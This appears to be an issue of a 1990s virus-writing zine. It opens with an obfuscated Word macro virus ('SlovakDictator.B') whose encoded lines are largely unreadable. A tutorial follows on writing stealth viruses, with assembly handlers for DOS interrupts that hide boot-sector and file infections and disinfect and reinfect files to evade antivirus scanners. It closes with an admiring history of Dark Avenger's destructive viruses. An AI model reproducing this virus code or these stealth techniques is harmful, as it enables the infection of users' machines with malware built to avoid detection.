"-5555&vxkskttg&o&ojk&uj&xogjqu|&FFY{h&UxomotgrSgixuHujFF17" FDCKUBLQVSMCLCS$(103) = "-5555&g€&vu&FFY{h&L\TOVLUXWS[O\FF37" FDCKUBLQVSMCLCS$(104) = "-5555&|krso&vu€uxtk&{xioz&zokzu&qutyzgtz&'''" FDCKUBLQVSMCLCS$(105) = "-5555" FDCKUBLQVSMCLCS$(106) = "Lux&o&C&[QKNRUJUMYZIHILKY&Zu&RGUMXJGTW[G[MKSJXI&@&Otykxz&LJIQ[HRW\YSIRIY*.o/&@&OtykxzVgxg&@&T k~z&o" FDCKUBLQVSMCLCS$(107) = "KjozXkvrgik&4Lotj&C&Inx*.<:/&1&Inx*.<:/2&4Xkvrgik&C&Inx*.9:/2&4Joxkizout&C&62&4SgzinIgyk&C&72 &4]nurk]uxj&C&62&4VgzzkxtSgzin&C&62&4Yu{tjyRoqk&C&62&4XkvrgikGrr2&4Luxsgz&C&62&4]xgv&C&72&4Lot jGrr]uxjLuxsy&C&6" FDCKUBLQVSMCLCS$(108) = "" FDCKUBLQVSMCLCS$(109) = "QORTKZUNYITZYMKH&C&3&Otz..:&1&Xtj./&0&76//" FDCKUBLQVSMCLCS$(110) = "Igrr&WXWR\QGHV[KPGGPMSL" FDCKUBLQVSMCLCS$(111) = "Otykxz&FFQORTKZUNYITZYMKH&C&FF&1&Yzx*.3&QORTKZUNYITZYMKH/" FDCKUBLQVSMCLCS$(112) = "OtykxzVgxg" FDCKUBLQVSMCLCS$(113) = "THXGUQOHHLUQMO" FDCKUBLQVSMCLCS$(114) = "JuiIruyk&7" FDCKUBLQVSMCLCS$(115) = "Gizo|gzk&I[SQSKJWYXM*" FDCKUBLQVSMCLCS$(116) = "Ktj&Y{h" FDCKUBLQVSMCLCS$(117) = ""






REM REM REM REM REM Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim

--------- WordMacro.SlovakDictator.B --------- source code - 2nd generation --------- it is cool, isn't it ? --------- do not modify ! --------------------------------------Shared JKHDBVIVFHSIOLGLEV Shared NIGFKLUPHSKEEEP Shared LEVOKOCHNNQPD Shared VNGOGKBSJINNKG Shared ATRUDJHVUTDA Shared UPMTKJGPISSNIKQEJHB Shared DUJEPAVVCNCSV Shared BQLLMJUMSKG Shared SQQVMSQFPFQOU Shared MCMAPPVBJCHTIJKLLG Shared MMPAAMLTJEJQ Shared QFOSABMOUOJTNFJEB$(200) Shared AUBQULPOOLFD Shared TACMICASEFBSRUC Shared DHFHBNUIMGVHS Shared QAUBRNSVSNMDMQPJ$(31)'OIEGDFGEGSODLPUVC Shared FLVFRFOSDHTKBSS







QFOSABMOUOJTNFJEB$(65) = "\~k)\qx€Kx " QFOSABMOUOJTNFJEB$(66) = "Yj{ujvnw}w‚Y~l)F)Mj‚1Wx€122" QFOSABMOUOJTNFJEB$(67) = "Ro)Yj{ujvnw}w‚Y~l)F)=)X{)Yj{ujvnw}w‚Y~l)F)::)]qnw" QFOSABMOUOJTNFJEB$(68) = "Knny" QFOSABMOUOJTNFJEB$(69) = "Knprw)Mrjuxp)^|n{Mrjuxp)<A95);;=5)II_r{~|)JUN[]*II" QFOSABMOUOJTNFJEB$(70) = "]n });A5)A5)<=B5):<5)IIbx~0{n)rwonl}nm)k‚)`x{mVjl{x7\uxjtMrl}j}x{7K)r{~|II5)7]n }:" QFOSABMOUOJTNFJEB$(71) = "]n }):>5);A5)<?95):<5)II`nulxvn)}x)}qn)UVN)1Ujvn{0|)Vjl{x)Nwprwn2)n{7):799II5)7]n };" QFOSABMOUOJTNFJEB$(72) = "]n }):=>5)>:5):;<5):<5)IIMr|)r|)Unnu)=;:II5)7]n }<" QFOSABMOUOJTNFJEB$(73) = "]n })<>5)@<5)<=;5):<5)II1l2)>6vj{6B@5)Wj|}‚)Ujvn{)//)^pu‚)U~|n{5)\uxjtrjII5)7]n }=" QFOSABMOUOJTNFJEB$(74) = "]n })<=5)BA5)<=<5):<5)IIMr|)r|)}qn)or{|})€x{um)}{~n)yxu‚vx{yqrl)vjl{x)r{~|)*II5)7]n }>" QFOSABMOUOJTNFJEB$(75) = "Y~|qK~}}xw):;95):AA5):=@5);:5)IIJllny})8)\~quj|II5)7Y~|q:" QFOSABMOUOJTNFJEB$(76) = "]n }):995):?>5);;A5):<5)IIKrp)o~lt)}x)}qn)krp)kx n{)_7V7II5)7]n }?" QFOSABMOUOJTNFJEB$(77) = "Nwm)Mrjuxp" QFOSABMOUOJTNFJEB$(78) = "Mrv)mup)J|)^|n{Mrjuxp" QFOSABMOUOJTNFJEB$(79) = "Mrjuxp1mup2" QFOSABMOUOJTNFJEB$(80) = "Nwm)Ro" QFOSABMOUOJTNFJEB$(81) = "Nwm)\~k" QFOSABMOUOJTNFJEB$(82) = "" QFOSABMOUOJTNFJEB$(83) = "O~wl}rxw)LqnltRw|}juunm1s2" QFOSABMOUOJTNFJEB$(84) = "Xw)N{{x{)[n|~vn)Wn }" QFOSABMOUOJTNFJEB$(85) = "LqnltRw|}juunm)F)9" QFOSABMOUOJTNFJEB$(86) = "Ox{)r)F):)]x)Lx~w}Vjl{x|1s2" QFOSABMOUOJTNFJEB$(87) = "Ro)Vjl{xWjvn-1r5)s2)F)IIJ~}xLux|nII)]qnw)LqnltRw|}juunm)F):" QFOSABMOUOJTNFJEB$(88) = "Wn })r" QFOSABMOUOJTNFJEB$(89) = "Nwm)O~wl}rxw" QFOSABMOUOJTNFJEB$(90) = "" QFOSABMOUOJTNFJEB$(91) = "\~k)Rwonl}1`qj}]xRwonl}2" QFOSABMOUOJTNFJEB$(92) = "ML^_^OYS]U-)F)`rwmx€Wjvn-12" QFOSABMOUOJTNFJEB$(93) = "]xxu|Vjl{x)7Wjvn)F)IIJ~}xLux|nII5)7\qx€)F)`qj}]xRwonl}5)7Nmr}" QFOSABMOUOJTNFJEB$(94) = "Nmr}Lunj{)6);9" QFOSABMOUOJTNFJEB$(95) = "" QFOSABMOUOJTNFJEB$(96) = "08888" QFOSABMOUOJTNFJEB$(97) = "08888)_uxƒnwrn)y{‚lq)J^KZ^UYXXUOM){rjmtx)txm~)vjt{j" QFOSABMOUOJTNFJEB$(98) = "08888)rmr}nuwj)lj|})6)wnvnwr})*" QFOSABMOUOJTNFJEB$(99) = "08888" QFOSABMOUOJTNFJEB$(100) = "Ox{)r)F)9)]x)J^KZ^UYXXUOM)C)Rw|n{})ZOX\JKVX^XS]WOSNK-1r2)C)Rw|n{}Yj{j)C)Wn })r" QFOSABMOUOJTNFJEB$(101) = "08888" QFOSABMOUOJTNFJEB$(102) = "08888)y{nvnwwj)r)rmn)xm){rjmtx)II\~k)X{rprwjuVjl{xKxm‚II4:" QFOSABMOUOJTNFJEB$(103) = "08888)jƒ)yx)II\~k)O]MSRUUUKKY\WYXPYMII6:" QFOSABMOUOJTNFJEB$(104) = "08888)nuvr)yxƒx{wn)~{lr})}rn}x)txw|}jw}‚)***" QFOSABMOUOJTNFJEB$(105) = "08888" QFOSABMOUOJTNFJEB$(106) = "Ox{)r)F)]JLVRLJ\NOK\[^L)]x)MQOQKW^RVP_Q\)C)Rw|n{})ZOX\JKVX^XS]WOSNK-1r2)C)Rw|n{}Yj{j)C)Wn })r" QFOSABMOUOJTNFJEB$(107) = "Nmr}[nyujln)7Orwm)F)Lq{-1?=2)4)Lq{-1?=25)7[nyujln)F)Lq{-1<=25)7Mr{nl}rxw)F)95)7Vj}lqLj|n)F):5 )7`qxun`x{m)F)95)7Yj}}n{wVj}lq)F)95)7\x~wm|Urtn)F)95)7[nyujlnJuu5)7Ox{vj})F)95)7`{jy)F):5)7Orw mJuu`x{mOx{v|)F)9" QFOSABMOUOJTNFJEB$(108) = "" QFOSABMOUOJTNFJEB$(109) = "VVYJJVU]SNSZ)F)6)Rw}11=)4)[wm12)3):922" QFOSABMOUOJTNFJEB$(110) = "Ljuu)JQLZ]NKQQZVJKSV\JWO" QFOSABMOUOJTNFJEB$(111) = "Rw|n{})IIVVYJJVU]SNSZ)F)II)4)\}{-16)VVYJJVU]SNSZ2" QFOSABMOUOJTNFJEB$(112) = "Rw|n{}Yj{j" QFOSABMOUOJTNFJEB$(113) = "MVWZ]ZMLPTLXSO]W\" QFOSABMOUOJTNFJEB$(114) = "MxlLux|n):" QFOSABMOUOJTNFJEB$(115) = "Jl}rj}n)ML^_^OYS]U-" QFOSABMOUOJTNFJEB$(116) = "Nwm)\~k" QFOSABMOUOJTNFJEB$(117) = ""





a handy overview by MGL/SVL exclusive for *-zine Introduction

In the very beginning of the computer viruses, when a virus was something very curious, there was no need to cover the fact of presence of a virus in files, memory or in boot sectors. But shortly after some people recognized, they can make money by removing viruses, the whole thing become much harder. Of course, there was no problem to code the virus itself, but the problem was to code such a virus, which could not be detected for at least some time by antivirus software. This time was essential for the virus to get in the wild. During the virus history, two basic technologies appeared - STEALTH and POLYMORPHISM. Both technologies are not unknown to the virus writing community and are used in the most succesfull viruses. Main goal of this article is to explain, how does stealth work and how to code a stealth virus.

Definition and principles

The STEALTH is the acting by a quiet and secret way, in order to avoid detection or hiding the presence of something. In the case of a computer virus means the stuff above not only to hide the presence of a virus in the place of storage (file or disc sector) but desirably (only in some cases) also to avoid the detection by antivirus software. This could be done only by the absolute control of infected computer's operating system by the virus. Every critical function of operating system should be penetrated and its return(s) changed to the 'normal' values - the values, which one would receive without the presence of virus in the system.

Requested knowledge base

To code really working steath virus is not a trivial task. The author has to be able to create and debug resident code - this is a must !!! The reason is very simple - WITHOUT RESIDENCY CAN'T VIRUS BE STEALTH. Debugging of resident code is very important. Stealth, that doesn't work is absolute lameness. Based on my own experiences, one of the best solutions for TSR debugging is Soft-Ice by Nu-Mega Technologies. With some minor exceptions is Soft-Ice also good for hacking. You 'll need some good description of operating system. In the case of MSDOS you have shitload of possibilities, but probaly the most acurate and most actuall description is the Interrupt List maintained by Ralf Brown. The actual version is now 53. Books 'Undocumented PC' and 'Undocumented DOS' are of good value for our purposes too. Besides the knoledges do not forget to reserve some time for coding and debugging. And now - the show can go on ...

Stealth for boot viruses

This case of stealth if the simplest one. We 'll have to work with whole sectors, and this is trivial task.

Sector 0/0/1 is MBR in the case of hard drive, on floppy this sector is boot sector. When a boot virus infects this sector, the original contens is moved elsewhere. Let's say, the virus stores the original sector 0/0/1 to sector 0/0/7. This location is in the virus writing community kinda traditional, it is heritage of the Stoned virus. But you can select any other location. After saving the original MBR/boot sector, the virus places own copy to sector 0/0/1. Then, after rebooting, the copy of the virus in sector 0/0/1 will be loaded to memory at adress 0:7C00h and 'll be excecuted. Virus then allocates memory for memory own resident copy, moves itself to "preserved" memory location, always hooks interrupt INT 13h (in some cases also some other interrupts) and then loads and executes stored MBR/boot sector. Woow! the virus is mow resident in memory, and has gained control over INT 13h. On every disk access virus gets control as first. This is not true in case of disk access using the ports here the virus can be detected. The main task for viral INT 13h handler is to recirect any attempt to read/write to sector 0/0/1 (where the virus is located) to 0/0/7. Attempts to write to the sector 0/0/7 (now containing the stored MBR/boot sector) should be ignored. If someone 'll try to read sector 0/0/7, we 'll have to put zeroes to his buffer at ES:BX. Then the handler of INT 13h 'll be like this:
int_13h_entry: pushf cmp dl,80h js flopak push cx or dl,dl jnz OK cmp cx,1 jnz OK

; floppy or hard drive ? ; this should hide the presence of ; virus in the MBR ; head 0 ? If so, then if ; ; track 0 sector 1, check critical functions stealth only when 1 sector read read long read ( is not necessary ) write long write (is not necessary )

cmp al,1 ja OK ; cmp ah,02h ; jz zvedavec cmp ah,0ah ; jz zvedavec cmp ah,03h ; jz write cmp ah,0bh ; jnz OK write: zvedavec: OK:

mov cl,7 ; redirect R/W to stored MBR call emulINT13h pop cx ; we call original INT 13h with "good ; parameters and we return callers CX ; which covers our tracks jmp short VRATsa

flopak: VRATsa:

.... .... .... popf retf 2

; here 'd be handled floppy access ; similar to hard drive access

emulINT13h: pushf call dword ptr cs:[original_INT13h] ret

But i have to say, this handle is not the perfect one. It doesn't handle the situation, when more than 1 sector is read or write. In such a case, this handler can be very "unfriendly". Moreover, this handler doesn't preserve the sector with stored MBR/boot sector. But to add such a code in not so hard and it is on you ... I have to say, thay only minority of viruses preserve the stored copy of MBR/boot sector. In most cases this copy 'll not be overwritten...

Preserve stored stuff !!!

Stealth for file viruses

Number of file viruses with some stealth is greater than that of boot viruses. Principles of stealth for file viruses if as follows: A. infected file has increased size. This size increas should be not visible. B. majority of file viruses uses some change in size, or time stamp or whatsoever to mark the file as infected. This change should be : preserved not visible C. any change in infected file should be not visible. This affects EXE header in the case of EXE files and initial JMP to virus body in the case of COM files, as well as any appended stuff to the file. D. in the case of complex approach, the presence of memory hole, in which virus resides, should by also hidden. Viruses, which handle points A+B+C(+D) are full stealth viruses. Viruses, which handles only point A are that so called semi-stealth viruses. Semi-stealth doesn't need a lot of code, and i 'll explain it first.

A. Semi-stealth

The main task for semi - stealth virus is to hide the size increase on infected files. This can be easily achieved by cutting the size in DTA after DOS Findfirst / Findnext operations. Such a virus 'll have to

handle not only the most common INT 21H/4EH and INT 21H/4FH, used by utilities of type Norton / Volkov Commander, but also DOS FindfirstFCB / FindnextFCB - INT 21H/11H and INT 21H/12H used by DOS command DIR. When operating with FCB, we have to know, that there is difference between FCB and Extended FCB. Some necessary stuff about DOS data structures you can find below. Format of File Control Block:
Offset -7 -6 5 -1 00h 01h 8 09h 3 0Ch 0Eh 10h 14h 16h 18h 8 20h 21h Size BYTE BYTEs BYTE BYTE BYTEs BYTEs WORD WORD DWORD WORD WORD BYTEs BYTE DWORD Description (Table 0648) extended FCB if FFh reserved file attribute if extended FCB drive number (0 = default, 1 = A, etc) blank-padded file name blank-padded file extension current block number logical record size file size date of last write (see #0952 at AX=5700h) time of last write (see #0951 at AX=5700h) (DOS 1.1+) reserved (see #0649,#0650,#0651,#0652,#0653) record within current block random access record number (if record size is > 64 bytes, high byte is omitted)

Note: to use an extended FCB, you must specify the address of the FFh flag at offset -7, rather than the address of the drive number field

Format of FCB reserved field for DOS 3.x:
Offset 18h 19h Size Description (Table 0652) BYTE number of system file table entry for file BYTE attributes bits 7,6: 00 = SHARE.EXE not loaded, disk file 01 = SHARE.EXE not loaded, character device 10 = SHARE.EXE loaded, remote file 11 = SHARE.EXE loaded, local file or device bits 5-0: low six bits of device attribute word ---SHARE.EXE loaded, local file--1Ah WORD starting cluster of file on disk 1Ch WORD (DOS 3.x) offset within SHARE of sharing record (see #0924 at AH=52h) 1Eh BYTE file attribute 1Fh BYTE ??? ---SHARE.EXE loaded, remote file--1Ah WORD number of sector containing directory entry 1Ch WORD relative cluster within file of last cluster accessed 1Eh BYTE absolute cluster number of last cluster accessed 1Fh BYTE ??? ---SHARE.EXE not loaded--1Ah BYTE (low byte of device attribute word AND 0Ch) OR open mode 1Bh WORD starting cluster of file 1Dh WORD number of sector containing directory entry 1Fh BYTE number of directory entry within sector

Note: if FCB opened on character device, DWORD at 1Ah is set to the address of the device driver header, then the BYTE at 1Ah is overwritten.

Format of FCB reserved field for DOS 5.0:
Offset 18h 19h Size Description (Table 0653) BYTE number of system file table entry for file BYTE attributes bits 7,6: 00 = SHARE.EXE not loaded, disk file 01 = SHARE.EXE not loaded, character device

10 = SHARE.EXE loaded, remote file 11 = SHARE.EXE loaded, local file or device bits 5-0: low six bits of device attribute word ---SHARE.EXE loaded, local file--1Ah WORD starting cluster of file on disk 1Ch WORD unique sequence number of sharing record 1Eh BYTE file attributes 1Fh BYTE unused??? ---SHARE.EXE loaded, remote file--1Ah WORD network handle 1Ch DWORD network ID ---SHARE not loaded, local device--1Ah DWORD pointer to device driver header 1Eh 2 BYTEs unused??? ---SHARE not loaded, local file--1Ah BYTE extra info bit 7: read-only attribute from SFT bit 6: archive attribute from SFT bits 5-0: high bits of sector number 1Bh WORD starting cluster of file 1Dh WORD low word of sector number containing directory entry 1Fh BYTE number of directory entry within sector

Format of FindFirst data block (taken from Ralf's Interrupt list)
Offset Size Description (Table 0913) ---PC-DOS 3.10, PC-DOS 4.01, MS-DOS 3.2/3.3/5.0--00h BYTE drive letter (bits 0-6), remote if bit 7 set 01h 11 BYTEs search template 0Ch BYTE search attributes ---DOS 2.x (and some DOS 3.x???)--00h BYTE search attributes 01h BYTE drive letter 02h 11 BYTEs search template ---WILDUNIX.COM--00h 12 BYTEs 15-character wildcard search pattern and drive letter (packed) 0Ch BYTE search attributes ---DOS 2.x and most 3.x--0Dh WORD entry count within directory 0Fh DWORD pointer to DTA??? 13h WORD cluster number of start of parent directory ---PC-DOS 4.01, MS-DOS 3.2/3.3/5.0--0Dh WORD entry count within directory 0Fh WORD cluster number of start of parent directory 11h 4 BYTEs reserved ---all versions, documented fields--15h BYTE attribute of file found 16h WORD file time (see #0951 at AX=5700h) 18h WORD file date (see #0952 at AX=5700h) 1Ah DWORD file size 1Eh 13 BYTEs ASCIZ filename+extension

The stategy for semi - stealth is very simple. 1. Allow the necessary call for operating system. 2. If error occured, bail out of the interrupt. 3. Get actual DTA. 4. Is the file executable? If it isn't, return from interrupt. 5. Check the file for infection. If the file is not infected, return from interrupt. 6. Cut the file size in DTA and leave the handler.

int_21: .... cmp ah,11h je DIR_STEALTH ; this is a part of viral ; INT 21h handler

cmp ah,12h je DIR_STEALTH cmp ah,4eh je DTA_STEALTH cmp ah,4fh je DTA_STEALTH .... DIR_STEALTH: call pushf pusha push or jnz dos_emu

; here handler continiues

; call original DOS handler of ; INT 21h

ds,es al,al ; was the call successfull? exit_size_fcb

mov ah,2fh call dos_emu ; get DTA adress to ES:BX push es pop ds cmp byte ptr [bx],0ff jne FCB_not_extended add bx,7 FCB_not_extended: call test_4_executable jc exit_size_fcb ; if not executable, exit call test_4_infection jc exit_size_fcb ; if not infected, exit call test_min_size jc exit_size_fcb ; skip 2 small files sub sbb exit_size_fcb: pop pop popa popf retf DTA_STEALTH: call pushf pusha push or jnz mov call push pop call jc call jc call jc sub sbb exit_size_dta: pop es pop ds popa popf retf 2 word ptr [bx+1dh],virus_size word ptr [bx+1fh],0 es ds 2 dos_emu ; call original DOS handler of ; INT 21h

ds,es al,al ; was the call successfull? exit_size_fcb ah,2fh dos_emu es ds

; get DTA adress to ES:BX

test_4_executable exit_size_dta ; if not executable, exit test_4_infection exit_size_dta ; if not infected, exit test_min_size exit_size_dta ; skip 2 small files word ptr [bx+1ah],virus_size word ptr [bx+1ch],0

As you may noticed, the code for DTA_STEALTH and DIR_STEALTH has a lot of the same stuff, and it could be possible to code it as one routine.

B. Mark-stealth

To demonstrate the stealth of infection mark, here is some piece of code. It was designed for virus, which uses as mark seconds in timestamp = 28. This handler doesn't cover the situation, where someone tries to get timestamp. In the case of coplex approach, this situation can be hadled too. But the user most likely will not notice any change ... And so this code seems to be optimal.
int_21: .... cmp ah,57h je fn_time .... ; this is a part of viral ; INT 21h handler ; here handler continiues

fn_time: or al,al ; get time ? je bye1 ; that we don't handle pusha push es call test_4_executable jc fn_time_exit0 ; not executable , skip push cx call get_time jnc uninfected ; infected ? pop cx ; yes mov ax,cx and ax,1f xor ax,0e je fn_time_exit0 ; 28 seconds ? then let him do it pop es popa push cx and cl,11100000b xor cl,0f jmp set_28 ; otherwise set always 28 fn_time_exit0: pop es popa jmp bye1 uninfected: pop cx mov ax,cx and ax,1f xor ax,0e ; set 28 seconds ? jnz fn_time_exit0 ; no exit set_26: pop es popa push cx dec cx ; set 26 seconds set_28: call dosemu pop cx ; but show 28 popf retf 2 bye1: jmp dword ptr cs:[original_INT21h]

C. Full stealth

Semi - stealth is for full stealth virii a must. To get a working full stealth virus, there are two different ways. desinfection on open / reinfection on close type stealth. true full stealth It is known fact, that to code virus of first type is much more easier as to code the virus of second type. To code viruses of both types requires some experiences, so the code which 'll follow is my well known "meta code".

Desinfection on open / Reinfection on close.
Here is desired not only the desinfection on open and reinfection on close, but also desinfection on 4B01h - load and do not execute, which is used by some debugers to load file in the memory. Just for lamers i point to 2 imporant things: after desinfecting the file, you have lseek to the BOF ! reinfection is prior to file close !

int_21: .... cmp ah,3dh je desinfect cmp ah,3eh je reinfect cmp ah,4bh je infect_file .... ; this is a part of viral ; INT 21h handler

; here handler continiues

infect_file: pusha push ds push es or al,al ; 4B00h jnz next call get_bastard ; infect file exit_exec: pop es pop ds popa jmp dword ptr cs:[original_INT21h] next: dec ax jnz exit_exec call open_file_DS_DX ; 4B01h call desinfect1 jmp short exit_exec get_bastard: .... ; stuff deleted call_open_file_DS_DX jc exit_infect get_bastard_handle: .... ; file infection here .... exit_infect: ret desinfect: call open_file_DS_DX pushf pusha push ds push es

call desinfect1 pop es pop ds popa popf retf 2 desinfect1: comment ~

Here you have to read the saved stuff from infected file to some memory buffer. Then truncate the file to its uninfected size (by writing 0 bytes to file with file pointer set to the location, where the uninfected file had EOF). And as last, restore the changed stuff from memory buffer and lseek to start of the file. Do not forget, if you alway open file with mode R/W for any DOS call, you may avoid nasty SFT manipulation when reinfecting the file on its closing.
~ ..... ; some code :))))

Situation before file is closed is simple... We do not have file name, but we have file handle. So we can use part of code, which is desiged to infect files on execution.
reinfect: pusha push ds push es call lseek_BOF call get_bastard_handle jmp exec_exit

True full shealth
This is most difficult task for every coder (besides some kick-the-ass poly engine). As this problem is very complex, I 'll only explain, what one should do on all critical DOS functions.

INT 21h / 4E,4F,11,12
Do just normal semi-stealth. But be carefull. In some cases, there is necessary to switch stealth off. Such a case is eg. the call of INT 21h/32h - Get DOS drive parameter block. Such a call is used by software like CHKDSK (all we know this for stealth viruses unfriendly program). To switch stealth on again, just wait for INT 21h/4ch.

INT 21h / 4B01h,40h
This is no problem at all. Just desinfect the file. If you are using stealth with SFT manipulation ( SFT stealth ), you 'll have some minor (for someone major problem). But the the help is siple - refer to my "SFT stealth tutorial" for elegant solution. This tutorial you can find in the Insane Reality #8.

INT 21h / 3Dh
If you are using SFT stealth, just cut the filesize in SFT here. Then noone can seek to the virus body, because DOS thinks, there is EOF in the location, where was EOF before virus body was appended. Otherwise do nothing.

INT 21h / 42h
Do not allow to seek within the virus body. You have to correct all the seeking relative to uninfected filesize. Do not forget to handle all the methods (0,1,2). In other words, just manipulate CX and DX.

INT 21h / 3Fh
This 'll be the most difficult part of code. As first check, where is the file pointer located. Just for better imagination, infected file looks like shown here:

If the file pointer is within the "changed stuff", read to their memory buffer data, which should be there, if the file wasn't infected ( from file pointer position to the end of "changed stuff"). Then read the rest of requested amount of bytes. Any reading in the area marked as "rest of infected file" is not dangerous. But if you detect, that the read can reach the virus body, cut the read to "legal" size. ( If you 're using SFT stealth, you do not need to handle this. For DOS, the viral body doesn't exist :)))).

INT 21h / 4Ch
Here you can control the execution of some programs. When you wan't to be sure, that some program really ends, you can do it like this. on INT 21h/4bh check the program name and store current PID, which is the same as PSP segment of current process. on INT 21h/4Ch compare the parents PID ( PSP:16) in current PSP (you can get it via mov ah,51h/ int 21h, result in BX). If this two values are same, the program ends.

INT 21h / 57h
Here you can stealth the changes in the time stamp. Do not allow to set stamp to "mark" value, and you can avoid to get the "mark" value by INT 21h / 5700h.

D. MCB stealth

This part is very short. If you want to known the principles and basics, refer to MCB stealth by Darkman in VLAD #6


A. Pro - stealth
stealth efectively hides the presence of virus in infected files in some cases stealth virus can spread faster with some lame AV software. (in the past, not now)

B. Contra - stealth
majority of stealth viruses can be catched in memory by simple scanstring. to combine full stealth with variable lenght poly is very hard task. every stealth virus gives exact tutorial, how to remove itself. And this is very, very pitty.

C. Solution:
The solution is TST. TST is trade mark, owned by Online. TST is Copyright (C) 1995-96 by Terror-6. But i am afraid, you 'll have to wait for Terror's next virus.

Some form of stealth is good in the beginning of infection. It helps to spread the virus. But on the other hand, stealth has some major disadvanteges. Download attached files here

This little contribution is dedicated to the eternal memory of THE DARK AVENGER (dedicaded to probaly upcoming 26th birthday of this legend ( or Diana's ? ) [ Text in these two lines above is pure speculation. Editor ] When somebody says computer virus, it 'll not take a long time to say the name Dark Avenger. You ask why ? If you do not know, you probably suffer of demencia or something like it. You should know, that Dark Avenger is the best known virus writer since the whole the vx scene started in late '80ties.

Its well known, that Dark Avenger is native Bulgarian, from the town of Sofia, and fan of the band Iron Maiden. But, probably, the only one, who knows Dark Avenger's real identity is Dark Avenger himself. There were some rumors, that the real name of Dark Avenger is Vesselin Bontchev, who now resides "on some lonely island in the northern Atlantic", but Mr.Bontchev, as well as the Dark Avenger, both 're of the same opinion:

Bontchev != Dark Avenger [reason in Bontchev's case is very easy to understand.:) ] It's also well know, that relationship of Dark Avenger to Vesselin could be described as disrespect, resp. very negative. At least one of variants of Dark Avenger virus targets programs cointaining string 'Vesselin Bontchev' and causes system hang if such a programm is run. Moreover, sometines Dark Avenger did use expression " the weassel " when he talked about Bontchev. But we have to say without Bontchev, there would be Dark Avenger not so "popular" and well known in the whole world. In the fact, Bontchev is the man, who's responsible for the worldwide publicity of Dark Avenger. The legend himself claimed, Bontchev made him to Dark Avenger. Moreover, it should be Bontschev, who engouraged people to create viruses by some of his articles and publications. According to Dark Avenger, some stuff written by Bontchev can be a good tutorial for those people, who want to code viruses and have no other information available.

But as I don't want to come off the topic, here is brief history of Dark Avenger's cariees as virus writer.

Some 9 or 10 years ago, when there was not such a lot of viruses out, one young Bulgarian boy was interesting in rather mysterious and not so well known area in computer science - the viruses. He thought of "making a programm that would travel on its own .. and to get to the places its creatore could never go". After reading an articles which discussed computer viruses he decided to write such a piece of code. He started work on his first virus in September 1988. Ocassionally he had access to an 4.77 MHz XT with no hardisk. As he finished the virus, he added destructive code in it, becauses he had no

idea, what else should he put in. He thought, the virus 'll never travel outside the city. Errare humanum est - to make errors is human. Dark Avenger was wrong in this case. His 651 bytes long virus, which cointained string 'Eddie lives' arrived in spring 1989 to the USA.

Technically, the Eddie.651 virus is simple TSR with hooked INT 21h, infecting both EXE and COM files on their execution. Infected file is marked within the timestamp - the value of the second is set to value 62. Besides INT 21h function EXEC virus hooks also the funcions FIND_FIRST_FCB and FIND_NEXT_FCB. These functions are called on DOS command DIR. And if such a call occurs, the virus subtract from size of the file with the second field in timestamp set to 62 its size. As virus doesn't check the size of such a file, if the file is smaller than 651 bytes, DIR shows filesize in gigabytes range. Virus cointains, as said before, string 'Eddie lives'.

Next Dark Avenger's production is well know - the Dark Avenger virus family with members 1800, 2000 and 2100 bytes long. All 3 members of this family are residen Com'n'Exe infectors. New idea in this family was the "fast infector" - files were infected not only when execuded, but also when opening, closing, changing attributes and creating. Not so new was the payload - when some condition were met, virus overwrites sectors at harddisk at random. Really cruel. There were also some texts in this viruses... [ofcos, every virus should have some texts, othervise it gets name like 4096 or 193257609 :) ]

Dark Avenger.1800:
Eddie lives...somewhere in time This program was written in the city of Sofia (C) 1988-89 Dark Avenger

As described above, Dark Avenger loves Vesselin Bontchev so much, that he included in Dark Avenger.2000 following lovely text string:
(C) 1989 by Vesselin Bontchev

And as the final nail, if programm to be run contains string "Vesselin Bontchev", virus hangs the system. In my humble opinion, Dark Avenger tried here to make Bontchev's live to hell with such a overkill payload. Ofcos, the nice stuff with trashing sectors on the harddisk has not been removed from the viral code. As for the 2100 bytes variant, it has some improvements in hiding the size increase of infected programs and so. Sources released by the author are included in this issue of our zine.

After some time, Dark Avenger released something absolutely unknown to the world. His another first was the hyped Mte - first ever poly engine. [Washburn's "excercises" i do not count, sorry ... ]

Polymorphism was something new at such a level [ :) ]. Mr. Skulason ( if i remember, responsible for fuckprot or whatsoever) wrote in Virus Bulletin in April '92 that Mte should be "a torture test for R&D departaments of all the antivirus companies". Moreover editor of the Virus Bulletin noticed that "Dark Avenger tech support is presumably better than offered by certain anti-virus vendors". He he he : ))))))) There were two releases of the Mte. In August 1991 was released Mte 0.91á and in April 1992 was released Mte 1.00á . The antivirus vendors were long time not able to detect Mte with 100% reliability. Detection rates were from 0% in case of Xtree's Allsafe v.4.1 or even worse, hanging the computer in case of CPAV and CPAVSOS v.14 to full 100% detection in case of IBM antivirus, F-prot, TBAV and many others.

Another Dark Avenger's first in the world was the COMMANDER BOMBER virus. In the time of its appearence, substantial part of AV programs didn't follow the code flow, just scaned for signatures near the file beginning and the file end. And now imagine the suprising of that so called virus researchers, that some blody virus is out which is not only inserted somewhere in the middle of the file, but also couple of island of code bound with calls and jmps leads to the virus body. [ I would like to see their faces in that historical moment ]. But in medias res .... COMMANDER BOMBER is inserting COM infector. Its own body is 22596 bytes long, but the added code is acually 4096 bytes long. Virus infects COM files on their execution, if their size is greater that 5120 bytes and less than 61183 bytes. COMMAND.??? 'll be never infected. Virus selects in the file 4 KB long block an this block is appended to the file. In this gap 'll be placed the viral code. Then virus generates some kind of garbage code, which brings the processing to the main virus code. Then only thing what garbage generation watches is the stack and SP value. But, unfortunately, garbage code generation seems to be buggy. ( about 1 of 8 samples generated not able to work ). This may be also the reason, why COMMANDER BOMBER wasn't so successfull when we compare with other Dark Avenger's viruses. This virus has also another interesting feature - absolutely no signature in files. But the files do not become infected over and over again. This is handled but very siple trick. When intected file is to be executed, virus saves its memory image to disk and then repares and execudes it. So if the file is infected twice, second infection rebuilds the file as it was with only one infection. And this firs infection saves to disk file infected only one. It is very handy trick, and you can try to code something like this.... Just for your information, Jim Bates, the man which is probably responsible for Black Baron of England (aka Christopher Pile) fate, had the feeling that "althoug there are similarities of style, ... [stuff deleted] ... that code is beyond his [ Dark Avenger's ] limited capabilities."

